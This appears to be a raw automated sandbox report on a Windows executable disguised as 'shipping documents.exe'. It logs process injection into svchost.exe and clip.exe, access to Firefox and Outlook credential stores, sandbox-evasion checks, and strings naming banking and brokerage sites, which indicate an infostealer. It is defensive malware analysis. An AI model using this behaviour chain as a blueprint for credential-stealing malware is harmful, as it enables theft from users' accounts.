Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006A8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_006A8CC3

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006BB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_006BB59E

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006CF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_006CF121

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006BC602 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_006BC602

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_00654FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00654FE9

Source: C:\Users\user\Desktop\shipping documents.exe

File created: C:\Users\user\AppData\Local\Temp\autD919.tmp

Jump to behavior

Source: shipping documents.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\shipping documents.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: clip.exe, 00000004.00000002.4516518251.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4516518251.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4516518251.0000000002AD1000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2467986016.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2465182875.0000000002AD1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: shipping documents.exe	ReversingLabs: Detection: 39%
Source: shipping documents.exe	Virustotal: Detection: 28%

Source: unknown	Process created: C:\Users\user\Desktop\shipping documents.exe "C:\Users\user\Desktop\shipping documents.exe"
Source: C:\Users\user\Desktop\shipping documents.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping documents.exe"
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\shipping documents.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping documents.exe"	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\clip.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\clip.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: shipping documents.exe

Static file information: File size 1216000 > 1048576

Source: shipping documents.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: shipping documents.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: shipping documents.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: shipping documents.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: shipping documents.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: shipping documents.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: shipping documents.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RxbWnCRczoMimJmDFzH.exe, 00000003.00000000.2193895263.000000000002E000.00000002.00000001.01000000.00000004.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000000.2351445535.000000000002E000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: shipping documents.exe, 00000000.00000003.2066595265.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, shipping documents.exe, 00000000.00000003.2066839742.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2177096394.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275990809.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275990809.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179143443.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2283344718.000000000474D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2274650593.0000000004597000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4518128097.0000000004900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4518128097.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: shipping documents.exe, 00000000.00000003.2066595265.0000000003DF0000.00000004.00001000.00020000.00000000.sdmp, shipping documents.exe, 00000000.00000003.2066839742.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2177096394.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275990809.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275990809.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179143443.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2283344718.000000000474D000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2274650593.0000000004597000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4518128097.0000000004900000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4518128097.0000000004A9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: clip.pdb source: svchost.exe, 00000002.00000002.2275553960.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2242514540.000000000081A000.00000004.00000020.00020000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000003.00000003.2213216681.00000000015C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: clip.exe, 00000004.00000002.4519037536.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4516518251.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000000.2353132572.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2573613752.000000001354C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: clip.exe, 00000004.00000002.4519037536.0000000004F2C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4516518251.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000006.00000000.2353132572.00000000025DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2573613752.000000001354C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000002.2275553960.0000000000800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2242514540.000000000081A000.00000004.00000020.00020000.00000000.sdmp, RxbWnCRczoMimJmDFzH.exe, 00000003.00000003.2213216681.00000000015C4000.00000004.00000020.00020000.00000000.sdmp

Source: shipping documents.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: shipping documents.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: shipping documents.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: shipping documents.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: shipping documents.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006CC304 LoadLibraryA,GetProcAddress,

0_2_006CC304

Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00678B85 push ecx; ret	0_2_00678B98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004031C0 push eax; ret	2_2_004031C2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004161D3 push ecx; ret	2_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004162CC push ecx; ret	2_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417356 push ebx; retf	2_2_00417359
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416338 push ecx; ret	2_2_004162EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004083DA push es; ret	2_2_004083DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040BBEC pushad ; iretd	2_2_0040BBEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418577 push 2823B84Bh; retf	2_2_00418587
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00417D38 push ecx; iretd	2_2_00417D39
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf	2_2_00401EDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00411E39 push esp; ret	2_2_00411E41
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf	2_2_00401EDE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F0225F pushad ; ret	2_2_02F027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F027FA pushad ; ret	2_2_02F027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F0283D push eax; iretd	2_2_02F02858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx	2_2_02F309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F01368 push eax; iretd	2_2_02F01369
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Code function: 3_2_062A2325 push eax; ret	3_2_062A2327
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Code function: 3_2_062A0B04 push edi; retf	3_2_062A0B2A
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Code function: 3_2_062973C1 push ecx; retf	3_2_062973C2
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Code function: 3_2_06296C2F push ecx; iretd	3_2_06296C30
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Code function: 3_2_06290036 push ss; iretd	3_2_06290035
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Code function: 3_2_06292800 push edx; ret	3_2_0629281C
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Code function: 3_2_0629C44A push cs; retf	3_2_0629C455
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Code function: 3_2_06291CC7 push edi; ret	3_2_06291CC8
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe	Code function: 3_2_06291D48 push FFFFFFB8h; retf	3_2_06291D4A

Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_00654A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00654A35
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006D55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_006D55FD

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006733C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_006733C7

Source: C:\Users\user\Desktop\shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\shipping documents.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\shipping documents.exe	API/Special instruction interceptor: Address: 3BA3254
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\clip.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_02F7096E rdtsc

2_2_02F7096E

Source: C:\Windows\SysWOW64\clip.exe

Window / User API: threadDelayed 9834

Jump to behavior

Source: C:\Users\user\Desktop\shipping documents.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-99450

Source: C:\Users\user\Desktop\shipping documents.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Windows\SysWOW64\clip.exe TID: 2232	Thread sleep count: 139 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 2232	Thread sleep time: -278000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 2232	Thread sleep count: 9834 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe TID: 2232	Thread sleep time: -19668000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe TID: 5692	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe TID: 5692	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe TID: 5692	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe TID: 5692	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\clip.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\clip.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006B4696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_006B4696
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BC93C FindFirstFileW,FindClose,	0_2_006BC93C
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_006BC9C7
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006BF200
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_006BF35D
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006BF65E
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006B3A2B
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_006B3D4E
Source: C:\Users\user\Desktop\shipping documents.exe	Code function: 0_2_006BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_006BBF27

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_00654AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00654AFE

Source: 23802I71.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 23802I71.4.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 23802I71.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 23802I71.4.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 23802I71.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: clip.exe, 00000004.00000002.4516518251.0000000002A55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 23802I71.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 23802I71.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RxbWnCRczoMimJmDFzH.exe, 00000006.00000002.4517440091.000000000073F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: 23802I71.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 23802I71.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 23802I71.4.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 23802I71.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: firefox.exe, 00000007.00000002.2575139309.000001CAD34DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 23802I71.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 23802I71.4.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 23802I71.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 23802I71.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 23802I71.4.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 23802I71.4.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 23802I71.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 23802I71.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 23802I71.4.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 23802I71.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 23802I71.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 23802I71.4.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 23802I71.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 23802I71.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_02F7096E rdtsc

2_2_02F7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004173E3 LdrLoadDll,

2_2_004173E3

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_006C41FD BlockInput,

0_2_006C41FD

Source: C:\Users\user\Desktop\shipping documents.exe

Code function: 0_2_00653B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00653B4C

Source: C:\Users\user\Desktop\shipping documents.exe

